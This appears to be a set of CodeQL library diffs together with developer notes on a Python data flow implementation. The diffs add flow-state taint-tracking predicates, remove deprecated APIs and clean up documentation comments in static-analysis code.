- The regression tests track the value of guards in order to eliminate impossible data flow. We currently have regressions because of this. We cannot readily replicate the existing method, as it uses the interdefinedness of data flow and taint tracking (there is a boolean taint kind). C++ [does something similar](https://github.com/github/codeql/blob/master/cpp/ql/src/semmle/code/cpp/controlflow/internal/ConstantExprs.qll#L27-L36) for eliminating impossible control flow, which we might be able to replicate (they infer values of "interesting" control flow nodes, which are those needed to determine values of guards).
- Flow for some syntactic constructs are done via extra taint steps in the existing implementation, we should find a way to get data flow for it. Some of this should be covered by field flow.
- A document is being written about proper use of the shared data flow library, this should be adhered to. In particular, we should consider replacing def-use with def-to-first-use and use-to-next-use in local flow.
- We seem to get duplicated results for global flow, as well as flow with and without type (so four times the "unique" results).
- We currently consider control flow nodes like exit nodes for functions, we should probably filter down which ones are of interest.
- We should probably override ToString for a number of data flow nodes.
- Test flow through classes, constructors and methods.
- What happens with named arguments? What does C# do?
- What should the enclosable callable for global variables be? C++ [makes it the variable itself](https://github.com/github/codeql/blob/master/cpp/ql/src/semmle/code/cpp/ir/dataflow/internal/DataFlowUtil.qll#L417), C# seems to not have nodes for these but only for their reads and writes.
- Is `yield` another return type? If not, how is it handled?
- Should `OutNode` include magic function calls?
- Consider creating an internal abstract class for nodes as C# does. Among other things, this can help the optimizer by stating that `getEnclosingCallable` [is functional](https://github.com/github/codeql/blob/master/csharp/ql/src/semmle/code/csharp/dataflow/internal/DataFlowPublic.qll#L62).

View File

@@ -64,13 +64,30 @@ abstract class Configuration extends DataFlow::Configuration {
override predicate isSource(DataFlow::Node source) { none() }
/**
* Holds if `sink` is a relevant taint sink.
* Holds if `source` is a relevant taint source with the given initial
* `state`.
*
* The smaller this predicate is, the faster `hasFlow()` will converge.
*/
// overridden to provide taint-tracking specific qldoc
override predicate isSource(DataFlow::Node source, DataFlow::FlowState state) { none() }
/**
* Holds if `sink` is a relevant taint sink
*
* The smaller this predicate is, the faster `hasFlow()` will converge.
*/
// overridden to provide taint-tracking specific qldoc
override predicate isSink(DataFlow::Node sink) { none() }
/**
* Holds if `sink` is a relevant taint sink accepting `state`.
*
* The smaller this predicate is, the faster `hasFlow()` will converge.
*/
// overridden to provide taint-tracking specific qldoc
override predicate isSink(DataFlow::Node sink, DataFlow::FlowState state) { none() }
/** Holds if the node `node` is a taint sanitizer. */
predicate isSanitizer(DataFlow::Node node) { none() }
@@ -79,6 +96,16 @@ abstract class Configuration extends DataFlow::Configuration {
defaultTaintSanitizer(node)
}
/**
* Holds if the node `node` is a taint sanitizer when the flow state is
* `state`.
*/
predicate isSanitizer(DataFlow::Node node, DataFlow::FlowState state) { none() }
final override predicate isBarrier(DataFlow::Node node, DataFlow::FlowState state) {
this.isSanitizer(node, state)
}
/** Holds if taint propagation into `node` is prohibited. */
predicate isSanitizerIn(DataFlow::Node node) { none() }
@@ -97,8 +124,17 @@ abstract class Configuration extends DataFlow::Configuration {
}
/**
* Holds if the additional taint propagation step from `node1` to `node2`
* must be taken into account in the analysis.
* Holds if taint propagation through nodes guarded by `guard` is prohibited
* when the flow state is `state`.
*/
predicate isSanitizerGuard(DataFlow::BarrierGuard guard, DataFlow::FlowState state) { none() }
final override predicate isBarrierGuard(DataFlow::BarrierGuard guard, DataFlow::FlowState state) {
this.isSanitizerGuard(guard, state)
}
/**
* Holds if taint may propagate from `node1` to `node2` in addition to the normal data-flow and taint steps.
*/
predicate isAdditionalTaintStep(DataFlow::Node node1, DataFlow::Node node2) { none() }
@@ -107,7 +143,25 @@ abstract class Configuration extends DataFlow::Configuration {
defaultAdditionalTaintStep(node1, node2)
}
override predicate allowImplicitRead(DataFlow::Node node, DataFlow::Content c) {
/**
* Holds if taint may propagate from `node1` to `node2` in addition to the normal data-flow and taint steps.
* This step is only applicable in `state1` and updates the flow state to `state2`.
*/
predicate isAdditionalTaintStep(
DataFlow::Node node1, DataFlow::FlowState state1, DataFlow::Node node2,
DataFlow::FlowState state2
) {
none()
}
final override predicate isAdditionalFlowStep(
DataFlow::Node node1, DataFlow::FlowState state1, DataFlow::Node node2,
DataFlow::FlowState state2
) {
this.isAdditionalTaintStep(node1, state1, node2, state2)
}
override predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet c) {
(this.isSink(node) or this.isAdditionalTaintStep(node, _)) and
defaultImplicitTaintRead(node, c)
}

View File

@@ -64,13 +64,30 @@ abstract class Configuration extends DataFlow::Configuration {
override predicate isSource(DataFlow::Node source) { none() }
/**
* Holds if `sink` is a relevant taint sink.
* Holds if `source` is a relevant taint source with the given initial
* `state`.
*
* The smaller this predicate is, the faster `hasFlow()` will converge.
*/
// overridden to provide taint-tracking specific qldoc
override predicate isSource(DataFlow::Node source, DataFlow::FlowState state) { none() }
/**
* Holds if `sink` is a relevant taint sink
*
* The smaller this predicate is, the faster `hasFlow()` will converge.
*/
// overridden to provide taint-tracking specific qldoc
override predicate isSink(DataFlow::Node sink) { none() }
/**
* Holds if `sink` is a relevant taint sink accepting `state`.
*
* The smaller this predicate is, the faster `hasFlow()` will converge.
*/
// overridden to provide taint-tracking specific qldoc
override predicate isSink(DataFlow::Node sink, DataFlow::FlowState state) { none() }
/** Holds if the node `node` is a taint sanitizer. */
predicate isSanitizer(DataFlow::Node node) { none() }
@@ -79,6 +96,16 @@ abstract class Configuration extends DataFlow::Configuration {
defaultTaintSanitizer(node)
}
/**
* Holds if the node `node` is a taint sanitizer when the flow state is
* `state`.
*/
predicate isSanitizer(DataFlow::Node node, DataFlow::FlowState state) { none() }
final override predicate isBarrier(DataFlow::Node node, DataFlow::FlowState state) {
this.isSanitizer(node, state)
}
/** Holds if taint propagation into `node` is prohibited. */
predicate isSanitizerIn(DataFlow::Node node) { none() }
@@ -97,8 +124,17 @@ abstract class Configuration extends DataFlow::Configuration {
}
/**
* Holds if the additional taint propagation step from `node1` to `node2`
* must be taken into account in the analysis.
* Holds if taint propagation through nodes guarded by `guard` is prohibited
* when the flow state is `state`.
*/
predicate isSanitizerGuard(DataFlow::BarrierGuard guard, DataFlow::FlowState state) { none() }
final override predicate isBarrierGuard(DataFlow::BarrierGuard guard, DataFlow::FlowState state) {
this.isSanitizerGuard(guard, state)
}
/**
* Holds if taint may propagate from `node1` to `node2` in addition to the normal data-flow and taint steps.
*/
predicate isAdditionalTaintStep(DataFlow::Node node1, DataFlow::Node node2) { none() }
@@ -107,7 +143,25 @@ abstract class Configuration extends DataFlow::Configuration {
defaultAdditionalTaintStep(node1, node2)
}
override predicate allowImplicitRead(DataFlow::Node node, DataFlow::Content c) {
/**
* Holds if taint may propagate from `node1` to `node2` in addition to the normal data-flow and taint steps.
* This step is only applicable in `state1` and updates the flow state to `state2`.
*/
predicate isAdditionalTaintStep(
DataFlow::Node node1, DataFlow::FlowState state1, DataFlow::Node node2,
DataFlow::FlowState state2
) {
none()
}
final override predicate isAdditionalFlowStep(
DataFlow::Node node1, DataFlow::FlowState state1, DataFlow::Node node2,
DataFlow::FlowState state2
) {
this.isAdditionalTaintStep(node1, state1, node2, state2)
}
override predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet c) {
(this.isSink(node) or this.isAdditionalTaintStep(node, _)) and
defaultImplicitTaintRead(node, c)
}

View File

@@ -64,13 +64,30 @@ abstract class Configuration extends DataFlow::Configuration {
override predicate isSource(DataFlow::Node source) { none() }
/**
* Holds if `sink` is a relevant taint sink.
* Holds if `source` is a relevant taint source with the given initial
* `state`.
*
* The smaller this predicate is, the faster `hasFlow()` will converge.
*/
// overridden to provide taint-tracking specific qldoc
override predicate isSource(DataFlow::Node source, DataFlow::FlowState state) { none() }
/**
* Holds if `sink` is a relevant taint sink
*
* The smaller this predicate is, the faster `hasFlow()` will converge.
*/
// overridden to provide taint-tracking specific qldoc
override predicate isSink(DataFlow::Node sink) { none() }
/**
* Holds if `sink` is a relevant taint sink accepting `state`.
*
* The smaller this predicate is, the faster `hasFlow()` will converge.
*/
// overridden to provide taint-tracking specific qldoc
override predicate isSink(DataFlow::Node sink, DataFlow::FlowState state) { none() }
/** Holds if the node `node` is a taint sanitizer. */
predicate isSanitizer(DataFlow::Node node) { none() }
@@ -79,6 +96,16 @@ abstract class Configuration extends DataFlow::Configuration {
defaultTaintSanitizer(node)
}
/**
* Holds if the node `node` is a taint sanitizer when the flow state is
* `state`.
*/
predicate isSanitizer(DataFlow::Node node, DataFlow::FlowState state) { none() }
final override predicate isBarrier(DataFlow::Node node, DataFlow::FlowState state) {
this.isSanitizer(node, state)
}
/** Holds if taint propagation into `node` is prohibited. */
predicate isSanitizerIn(DataFlow::Node node) { none() }
@@ -97,8 +124,17 @@ abstract class Configuration extends DataFlow::Configuration {
}
/**
* Holds if the additional taint propagation step from `node1` to `node2`
* must be taken into account in the analysis.
* Holds if taint propagation through nodes guarded by `guard` is prohibited
* when the flow state is `state`.
*/
predicate isSanitizerGuard(DataFlow::BarrierGuard guard, DataFlow::FlowState state) { none() }
final override predicate isBarrierGuard(DataFlow::BarrierGuard guard, DataFlow::FlowState state) {
this.isSanitizerGuard(guard, state)
}
/**
* Holds if taint may propagate from `node1` to `node2` in addition to the normal data-flow and taint steps.
*/
predicate isAdditionalTaintStep(DataFlow::Node node1, DataFlow::Node node2) { none() }
@@ -107,7 +143,25 @@ abstract class Configuration extends DataFlow::Configuration {
defaultAdditionalTaintStep(node1, node2)
}
override predicate allowImplicitRead(DataFlow::Node node, DataFlow::Content c) {
/**
* Holds if taint may propagate from `node1` to `node2` in addition to the normal data-flow and taint steps.
* This step is only applicable in `state1` and updates the flow state to `state2`.
*/
predicate isAdditionalTaintStep(
DataFlow::Node node1, DataFlow::FlowState state1, DataFlow::Node node2,
DataFlow::FlowState state2
) {
none()
}
final override predicate isAdditionalFlowStep(
DataFlow::Node node1, DataFlow::FlowState state1, DataFlow::Node node2,
DataFlow::FlowState state2
) {
this.isAdditionalTaintStep(node1, state1, node2, state2)
}
override predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet c) {
(this.isSink(node) or this.isAdditionalTaintStep(node, _)) and
defaultImplicitTaintRead(node, c)
}

View File

@@ -64,13 +64,30 @@ abstract class Configuration extends DataFlow::Configuration {
override predicate isSource(DataFlow::Node source) { none() }
/**
* Holds if `sink` is a relevant taint sink.
* Holds if `source` is a relevant taint source with the given initial
* `state`.
*
* The smaller this predicate is, the faster `hasFlow()` will converge.
*/
// overridden to provide taint-tracking specific qldoc
override predicate isSource(DataFlow::Node source, DataFlow::FlowState state) { none() }
/**
* Holds if `sink` is a relevant taint sink
*
* The smaller this predicate is, the faster `hasFlow()` will converge.
*/
// overridden to provide taint-tracking specific qldoc
override predicate isSink(DataFlow::Node sink) { none() }
/**
* Holds if `sink` is a relevant taint sink accepting `state`.
*
* The smaller this predicate is, the faster `hasFlow()` will converge.
*/
// overridden to provide taint-tracking specific qldoc
override predicate isSink(DataFlow::Node sink, DataFlow::FlowState state) { none() }
/** Holds if the node `node` is a taint sanitizer. */
predicate isSanitizer(DataFlow::Node node) { none() }
@@ -79,6 +96,16 @@ abstract class Configuration extends DataFlow::Configuration {
defaultTaintSanitizer(node)
}
/**
* Holds if the node `node` is a taint sanitizer when the flow state is
* `state`.
*/
predicate isSanitizer(DataFlow::Node node, DataFlow::FlowState state) { none() }
final override predicate isBarrier(DataFlow::Node node, DataFlow::FlowState state) {
this.isSanitizer(node, state)
}
/** Holds if taint propagation into `node` is prohibited. */
predicate isSanitizerIn(DataFlow::Node node) { none() }
@@ -97,8 +124,17 @@ abstract class Configuration extends DataFlow::Configuration {
}
/**
* Holds if the additional taint propagation step from `node1` to `node2`
* must be taken into account in the analysis.
* Holds if taint propagation through nodes guarded by `guard` is prohibited
* when the flow state is `state`.
*/
predicate isSanitizerGuard(DataFlow::BarrierGuard guard, DataFlow::FlowState state) { none() }
final override predicate isBarrierGuard(DataFlow::BarrierGuard guard, DataFlow::FlowState state) {
this.isSanitizerGuard(guard, state)
}
/**
* Holds if taint may propagate from `node1` to `node2` in addition to the normal data-flow and taint steps.
*/
predicate isAdditionalTaintStep(DataFlow::Node node1, DataFlow::Node node2) { none() }
@@ -107,7 +143,25 @@ abstract class Configuration extends DataFlow::Configuration {
defaultAdditionalTaintStep(node1, node2)
}
override predicate allowImplicitRead(DataFlow::Node node, DataFlow::Content c) {
/**
* Holds if taint may propagate from `node1` to `node2` in addition to the normal data-flow and taint steps.
* This step is only applicable in `state1` and updates the flow state to `state2`.
*/
predicate isAdditionalTaintStep(
DataFlow::Node node1, DataFlow::FlowState state1, DataFlow::Node node2,
DataFlow::FlowState state2
) {
none()
}
final override predicate isAdditionalFlowStep(
DataFlow::Node node1, DataFlow::FlowState state1, DataFlow::Node node2,
DataFlow::FlowState state2
) {
this.isAdditionalTaintStep(node1, state1, node2, state2)
}
override predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet c) {
(this.isSink(node) or this.isAdditionalTaintStep(node, _)) and
defaultImplicitTaintRead(node, c)
}

View File

@@ -119,16 +119,6 @@ module TaintTracking {
this.(TaintTrackingImplementation).hasFlowPath(src, sink)
}
/* Old query API */
/* deprecated */
deprecated predicate hasFlow(Source src, Sink sink) {
exists(PathSource psrc, PathSink psink |
this.hasFlowPath(psrc, psink) and
src = psrc.getNode().asCfgNode() and
sink = psink.getNode().asCfgNode()
)
}
/* New query API */
predicate hasSimpleFlow(DataFlow::Node src, DataFlow::Node sink) {
exists(PathSource psrc, PathSink psink |

View File

@@ -79,7 +79,7 @@ abstract class AttributePath extends TAttributePath {
predicate noAttribute() { this = TNoAttribute() }
}
/** AttributePath for no attribute. */
/** The `AttributePath` for no attribute. */
class NoAttribute extends TNoAttribute, AttributePath {
override string toString() { result = "no attribute" }
@@ -88,7 +88,7 @@ class NoAttribute extends TNoAttribute, AttributePath {
override AttributePath fromAttribute(string name) { none() }
}
/** AttributePath for an attribute. */
/** The `AttributePath` for an attribute. */
class NamedAttributePath extends TAttribute, AttributePath {
override string toString() {
exists(string attr |
@@ -124,8 +124,8 @@ newtype TTaintTrackingNode =
}
/**
* Class representing the (node, context, path, kind) tuple.
* Used for context-sensitive path-aware taint-tracking.
* A class representing the (node, context, path, kind) tuple.
* Used for context-sensitive path-aware taint-tracking.
*/
class TaintTrackingNode extends TTaintTrackingNode {
/** Gets a textual representation of this element. */
@@ -900,22 +900,6 @@ private class EssaTaintTracking extends string {
or
result = this.testEvaluates(defn, not_operand(test), use, src).booleanNot()
}
/**
* Holds if `test` is the test in a branch and `use` is that test
* with all the `not` prefixes removed.
*/
private predicate boolean_filter(ControlFlowNode test, ControlFlowNode use) {
any(PyEdgeRefinement ref).getTest() = test and
(
use = test
or
exists(ControlFlowNode notuse |
this.boolean_filter(test, notuse) and
use = not_operand(notuse)
)
)
}
}
private predicate testEvaluatesMaybe(ControlFlowNode test, ControlFlowNode use) {
@@ -991,7 +975,7 @@ int iterable_unpacking_descent(SequenceNode left_parent, ControlFlowNode left_de
}
module Implementation {
/* A call that returns a copy (or similar) of the argument */
/** Holds if `tonode` is a call that returns a copy (or similar) of the argument `fromnode` */
predicate copyCall(ControlFlowNode fromnode, CallNode tonode) {
tonode.getFunction().(AttrNode).getObject("copy") = fromnode
or

View File

@@ -2,24 +2,7 @@ import semmle.python.dataflow.TaintTracking
private import semmle.python.objects.ObjectInternal
import semmle.python.dataflow.Implementation
/* For backwards compatibility -- Use `TaintTrackingContext` instead. */
deprecated class CallContext extends TaintTrackingContext {
TaintTrackingContext getCallee(CallNode call) { result.getCaller(call) = this }
predicate appliesToScope(Scope s) {
exists(PythonFunctionObjectInternal func, TaintKind param, AttributePath path, int n |
this = TParamContext(param, path, n) and
exists(TaintTrackingImplementation impl |
impl.callWithTaintedArgument(_, _, _, func, n, path, param) and
s = func.getScope()
)
)
or
this.isTop()
}
}
/* Backwards compatibility with config-less taint-tracking */
/** A configuration that provides backwards compatibility with config-less taint-tracking */
private class LegacyConfiguration extends TaintTracking::Configuration {
LegacyConfiguration() {
/* A name that won't be accidentally chosen by users */

View File

@@ -9,7 +9,6 @@
*/
import python
private import semmle.python.pointsto.Base
private import semmle.python.pointsto.PointsTo
private import semmle.python.pointsto.PointsToContext
private import semmle.python.objects.ObjectInternal
@@ -46,14 +45,14 @@ abstract class TrackableState extends string {
/**
* Holds if state starts at `f`.
* Either this predicate or `startsAt(ControlFlowNode f, Context ctx)`
* should be overriden by sub-classes.
* should be overridden by sub-classes.
*/
predicate startsAt(ControlFlowNode f) { none() }
/**
* Holds if state starts at `f` given context `ctx`.
* Either this predicate or `startsAt(ControlFlowNode f)`
* should be overriden by sub-classes.
* should be overridden by sub-classes.
*/
pragma[noinline]
predicate startsAt(ControlFlowNode f, Context ctx) { ctx.appliesTo(f) and this.startsAt(f) }
@@ -61,14 +60,14 @@ abstract class TrackableState extends string {
/**
* Holds if state ends at `f`.
* Either this predicate or `endsAt(ControlFlowNode f, Context ctx)`
* may be overriden by sub-classes.
* may be overridden by sub-classes.
*/
predicate endsAt(ControlFlowNode f) { none() }
/**
* Holds if state ends at `f` given context `ctx`.
* Either this predicate or `endsAt(ControlFlowNode f)`
* may be overriden by sub-classes.
* may be overridden by sub-classes.
*/
pragma[noinline]
predicate endsAt(ControlFlowNode f, Context ctx) { ctx.appliesTo(f) and this.endsAt(f) }

View File

@@ -138,9 +138,6 @@ abstract class TaintKind extends string {
exists(TaintedNode n | n.getTaintKind() = this and n.getCfgNode() = expr)
}
/** DEPRECATED -- Use getType() instead */
deprecated ClassObject getClass() { none() }
/**
* Gets the class of this kind of taint.
* For example, if this were a kind of string taint
@@ -180,7 +177,7 @@ abstract class TaintKind extends string {
}
/**
* Alias of `TaintKind`, so the two types can be used interchangeably.
* An Alias of `TaintKind`, so the two types can be used interchangeably.
*/
class FlowLabel = TaintKind;
@@ -561,7 +558,7 @@ module DataFlowExtension {
ControlFlowNode getACalleeSuccessorNode(CallNode call) { none() }
}
/** Data flow variable that modifies the basic data-flow. */
/** A data flow variable that modifies the basic data-flow. */
class DataFlowVariable extends EssaVariable {
/**
* Gets a successor node for data-flow.
@@ -608,49 +605,11 @@ private import semmle.python.pointsto.PointsTo
*/
module DataFlow {
/**
* Generic taint kind, source and sink classes for convenience and
* The generic taint kind, source and sink classes for convenience and
* compatibility with other language libraries
*/
class Extension = DataFlowExtension::DataFlowNode;
abstract deprecated class Configuration extends string {
bindingset[this]
Configuration() { this = this }
abstract predicate isSource(ControlFlowNode source);
abstract predicate isSink(ControlFlowNode sink);
private predicate hasFlowPath(TaintedNode source, TaintedNode sink) {
source.getConfiguration() = this and
this.isSource(source.getCfgNode()) and
this.isSink(sink.getCfgNode()) and
source.flowsTo(sink)
}
predicate hasFlow(ControlFlowNode source, ControlFlowNode sink) {
exists(TaintedNode psource, TaintedNode psink |
psource.getCfgNode() = source and
psink.getCfgNode() = sink and
this.isSource(source) and
this.isSink(sink) and
this.hasFlowPath(psource, psink)
)
}
}
deprecated private class ConfigurationAdapter extends TaintTracking::Configuration instanceof Configuration {
override predicate isSource(DataFlow::Node node, TaintKind kind) {
Configuration.super.isSource(node.asCfgNode()) and
kind instanceof DataFlowType
}
override predicate isSink(DataFlow::Node node, TaintKind kind) {
Configuration.super.isSink(node.asCfgNode()) and
kind instanceof DataFlowType
}
}
private newtype TDataFlowNode =
TEssaNode(EssaVariable var) or
TCfgNode(ControlFlowNode node)
@@ -670,9 +629,6 @@ module DataFlow {
abstract Location getLocation();
AstNode asAstNode() { result = this.asCfgNode().getNode() }
/** For backwards compatibility -- Use asAstNode() instead */
deprecated AstNode getNode() { result = this.asAstNode() }
}
class CfgNode extends Node, TCfgNode {
@@ -709,9 +665,10 @@ module DataFlow {
}
deprecated private class DataFlowType extends TaintKind {
// this only exists to avoid an empty recursion error in the type checker
DataFlowType() {
this = "Data flow" and
exists(DataFlow::Configuration c)
1 = 2
}
}

View File

@@ -158,13 +158,13 @@ private predicate defn_of_instance_attribute(Assign asgn, Class c, string name)
)
}
/* Whether asgn defines an attribute of a class */
/** Holds if asgn defines an attribute of a class */
private predicate defn_of_class_attribute(Assign asgn, Class c, string name) {
asgn.getScope() = c and
asgn.getATarget().(Name).getId() = name
}
/* Holds if `value` is a value assigned to the `name`d attribute of module `m`. */
/** Holds if `value` is a value assigned to the `name`d attribute of module `m`. */
private predicate defn_of_module_attribute(ControlFlowNode value, Module m, string name) {
exists(DefinitionNode def |
def.getScope() = m and

View File

@@ -5,6 +5,7 @@
import python
private import SsaCompute
import semmle.python.essa.Definitions
private import semmle.python.internal.CachedStages
/** An (enhanced) SSA variable derived from `SsaSourceVariable`. */
class EssaVariable extends TEssaDefinition {
@@ -134,7 +135,7 @@ private newtype TEssaDefinition =
TPhiFunction(SsaSourceVariable v, BasicBlock b) { EssaDefinitions::phiNode(v, b) }
/**
* Definition of an extended-SSA (ESSA) variable.
* A definition of an extended-SSA (ESSA) variable.
* There is exactly one definition for each variable,
* and exactly one variable for each definition.
*/
@@ -171,6 +172,9 @@ abstract class EssaDefinition extends TEssaDefinition {
EssaVariable getVariable() { result.getDefinition() = this }
abstract BasicBlock getBasicBlock();
/** Gets the name of the primary QL class for this element. */
string getAPrimaryQlClass() { result = "EssaDefinition" }
}
/**
@@ -216,13 +220,15 @@ class EssaEdgeRefinement extends EssaDefinition, TEssaEdgeDefinition {
}
override string getRepresentation() {
result = this.getAQlClass() + "(" + this.getInput().getRepresentation() + ")"
result = this.getAPrimaryQlClass() + "(" + this.getInput().getRepresentation() + ")"
}
/** Gets the scope of the variable defined by this definition. */
override Scope getScope() { result = this.getPredecessor().getScope() }
override BasicBlock getBasicBlock() { result = this.getSuccessor() }
override string getAPrimaryQlClass() { result = "EssaEdgeRefinement" }
}
/** A Phi-function as specified in classic SSA form. */
@@ -265,6 +271,7 @@ class PhiFunction extends EssaDefinition, TPhiFunction {
/** Gets the input variable for this phi node on the edge `pred` -> `this.getBasicBlock()`, if any. */
cached
EssaVariable getInput(BasicBlock pred) {
Stages::AST::ref() and
result.getDefinition() = this.reachingDefinition(pred)
or
result.getDefinition() = this.inputEdgeRefinement(pred)
@@ -366,6 +373,8 @@ class PhiFunction extends EssaDefinition, TPhiFunction {
)
)
}
override string getAPrimaryQlClass() { result = "PhiFunction" }
}
/**
@@ -396,7 +405,7 @@ class EssaNodeDefinition extends EssaDefinition, TEssaNodeDefinition {
override Location getLocation() { result = this.getDefiningNode().getLocation() }
override string getRepresentation() { result = this.getAQlClass() }
override string getRepresentation() { result = this.getAPrimaryQlClass() }
override Scope getScope() {
exists(BasicBlock defb |
@@ -414,6 +423,8 @@ class EssaNodeDefinition extends EssaDefinition, TEssaNodeDefinition {
}
override BasicBlock getBasicBlock() { result = this.getDefiningNode().getBasicBlock() }
override string getAPrimaryQlClass() { result = "EssaNodeDefinition" }
}
/** A definition of an ESSA variable that takes another ESSA variable as an input. */
@@ -448,10 +459,10 @@ class EssaNodeRefinement extends EssaDefinition, TEssaNodeRefinement {
override Location getLocation() { result = this.getDefiningNode().getLocation() }
override string getRepresentation() {
result = this.getAQlClass() + "(" + this.getInput().getRepresentation() + ")"
result = this.getAPrimaryQlClass() + "(" + this.getInput().getRepresentation() + ")"
or
not exists(this.getInput()) and
result = this.getAQlClass() + "(" + this.getSourceVariable().getName() + "??)"
result = this.getAPrimaryQlClass() + "(" + this.getSourceVariable().getName() + "??)"
}
override Scope getScope() {
@@ -470,6 +481,8 @@ class EssaNodeRefinement extends EssaDefinition, TEssaNodeRefinement {
}
override BasicBlock getBasicBlock() { result = this.getDefiningNode().getBasicBlock() }
override string getAPrimaryQlClass() { result = "EssaNodeRefinement" }
}
pragma[noopt]
@@ -483,26 +496,22 @@ private EssaVariable potential_input(EssaNodeRefinement ref) {
)
}
/* For backwards compatibility */
deprecated class PyNodeDefinition = EssaNodeDefinition;
/* For backwards compatibility */
deprecated class PyNodeRefinement = EssaNodeRefinement;
/** An assignment to a variable `v = val` */
class AssignmentDefinition extends EssaNodeDefinition {
ControlFlowNode value;
AssignmentDefinition() {
SsaSource::assignment_definition(this.getSourceVariable(), this.getDefiningNode(), _)
SsaSource::assignment_definition(this.getSourceVariable(), this.getDefiningNode(), value)
}
ControlFlowNode getValue() {
SsaSource::assignment_definition(this.getSourceVariable(), this.getDefiningNode(), result)
}
ControlFlowNode getValue() { result = value }
override string getRepresentation() { result = this.getValue().getNode().toString() }
override string getAPrimaryQlClass() { result = "AssignmentDefinition" }
}
/** Capture of a raised exception `except ExceptionType ex:` */
/** A capture of a raised exception `except ExceptionType ex:` */
class ExceptionCapture extends EssaNodeDefinition {
ExceptionCapture() {
SsaSource::exception_capture(this.getSourceVariable(), this.getDefiningNode())
@@ -516,6 +525,8 @@ class ExceptionCapture extends EssaNodeDefinition {
}
override string getRepresentation() { result = "except " + this.getSourceVariable().getName() }
override string getAPrimaryQlClass() { result = "ExceptionCapture" }
}
/** An assignment to a variable as part of a multiple assignment `..., v, ... = val` */
@@ -536,6 +547,8 @@ class MultiAssignmentDefinition extends EssaNodeDefinition {
SsaSource::multi_assignment_definition(this.getSourceVariable(), this.getDefiningNode(), index,
lhs)
}
override string getAPrimaryQlClass() { result = "MultiAssignmentDefinition" }
}
/** A definition of a variable in a `with` statement */
@@ -543,6 +556,8 @@ class WithDefinition extends EssaNodeDefinition {
WithDefinition() { SsaSource::with_definition(this.getSourceVariable(), this.getDefiningNode()) }
override string getRepresentation() { result = "with" }
override string getAPrimaryQlClass() { result = "WithDefinition" }
}
/** A definition of a variable via a capture pattern */
@@ -552,6 +567,8 @@ class PatternCaptureDefinition extends EssaNodeDefinition {
}
override string getRepresentation() { result = "pattern capture" }
override string getAPrimaryQlClass() { result = "PatternCaptureDefinition" }
}
/** A definition of a variable via a pattern alias */
@@ -561,6 +578,8 @@ class PatternAliasDefinition extends EssaNodeDefinition {
}
override string getRepresentation() { result = "pattern alias" }
override string getAPrimaryQlClass() { result = "PatternAliasDefinition" }
}
/** A definition of a variable by declaring it as a parameter */
@@ -594,6 +613,8 @@ class ParameterDefinition extends EssaNodeDefinition {
/** Gets the `Parameter` this `ParameterDefinition` represents. */
Parameter getParameter() { result = this.getDefiningNode().getNode() }
override string getAPrimaryQlClass() { result = "ParameterDefinition" }
}
/** A deletion of a variable `del v` */
@@ -601,10 +622,12 @@ class DeletionDefinition extends EssaNodeDefinition {
DeletionDefinition() {
SsaSource::deletion_definition(this.getSourceVariable(), this.getDefiningNode())
}
override string getAPrimaryQlClass() { result = "DeletionDefinition" }
}
/**
* Definition of variable at the entry of a scope. Usually this represents the transfer of
* A definition of variable at the entry of a scope. Usually this represents the transfer of
* a global or non-local variable from one scope to another.
*/
class ScopeEntryDefinition extends EssaNodeDefinition {
@@ -614,16 +637,20 @@ class ScopeEntryDefinition extends EssaNodeDefinition {
}
override Scope getScope() { result.getEntryNode() = this.getDefiningNode() }
override string getAPrimaryQlClass() { result = "ScopeEntryDefinition" }
}
/** Possible redefinition of variable via `from ... import *` */
/** A possible redefinition of variable via `from ... import *` */
class ImportStarRefinement extends EssaNodeRefinement {
ImportStarRefinement() {
SsaSource::import_star_refinement(this.getSourceVariable(), _, this.getDefiningNode())
}
override string getAPrimaryQlClass() { result = "ImportStarRefinement" }
}
/** Assignment of an attribute `obj.attr = val` */
/** An assignment of an attribute `obj.attr = val` */
class AttributeAssignment extends EssaNodeRefinement {
AttributeAssignment() {
SsaSource::attribute_assignment_refinement(this.getSourceVariable(), _, this.getDefiningNode())
@@ -635,12 +662,16 @@ class AttributeAssignment extends EssaNodeRefinement {
override string getRepresentation() {
result =
this.getAQlClass() + " '" + this.getName() + "'(" + this.getInput().getRepresentation() + ")"
this.getAPrimaryQlClass() + " '" + this.getName() + "'(" + this.getInput().getRepresentation()
+ ")"
or
not exists(this.getInput()) and
result =
this.getAQlClass() + " '" + this.getName() + "'(" + this.getSourceVariable().getName() + "??)"
this.getAPrimaryQlClass() + " '" + this.getName() + "'(" + this.getSourceVariable().getName() +
"??)"
}
override string getAPrimaryQlClass() { result = "AttributeAssignment" }
}
/** A use of a variable as an argument, `foo(v)`, which might modify the object referred to. */
@@ -654,15 +685,19 @@ class ArgumentRefinement extends EssaNodeRefinement {
ControlFlowNode getArgument() { result = argument }
CallNode getCall() { result = this.getDefiningNode() }
override string getAPrimaryQlClass() { result = "ArgumentRefinement" }
}
/** Deletion of an attribute `del obj.attr`. */
/** A deletion of an attribute `del obj.attr`. */
class EssaAttributeDeletion extends EssaNodeRefinement {
EssaAttributeDeletion() {
SsaSource::attribute_deletion_refinement(this.getSourceVariable(), _, this.getDefiningNode())
}
string getName() { result = this.getDefiningNode().(AttrNode).getName() }
override string getAPrimaryQlClass() { result = "EssaAttributeDeletion" }
}
/** A pi-node (guard) with only one successor. */
@@ -690,10 +725,12 @@ class SingleSuccessorGuard extends EssaNodeRefinement {
test = this.getDefiningNode() and
SsaSource::test_refinement(this.getSourceVariable(), use, test)
}
override string getAPrimaryQlClass() { result = "SingleSuccessorGuard" }
}
/**
* Implicit definition of the names of sub-modules in a package.
* An implicit definition of the names of sub-modules in a package.
* Although the interpreter does not pre-define these names, merely populating them
* as they are imported, this is a good approximation for static analysis.
*/
@@ -701,11 +738,13 @@ class ImplicitSubModuleDefinition extends EssaNodeDefinition {
ImplicitSubModuleDefinition() {
SsaSource::init_module_submodule_defn(this.getSourceVariable(), this.getDefiningNode())
}
override string getAPrimaryQlClass() { result = "ImplicitSubModuleDefinition" }
}
/** An implicit (possible) definition of an escaping variable at a call-site */
class CallsiteRefinement extends EssaNodeRefinement {
override string toString() { result = "CallsiteRefinement" }
override string toString() { result = "CallSiteRefinement" }
CallsiteRefinement() {
exists(SsaSourceVariable var, ControlFlowNode defn |
@@ -718,24 +757,31 @@ class CallsiteRefinement extends EssaNodeRefinement {
}
CallNode getCall() { this.getDefiningNode() = result }
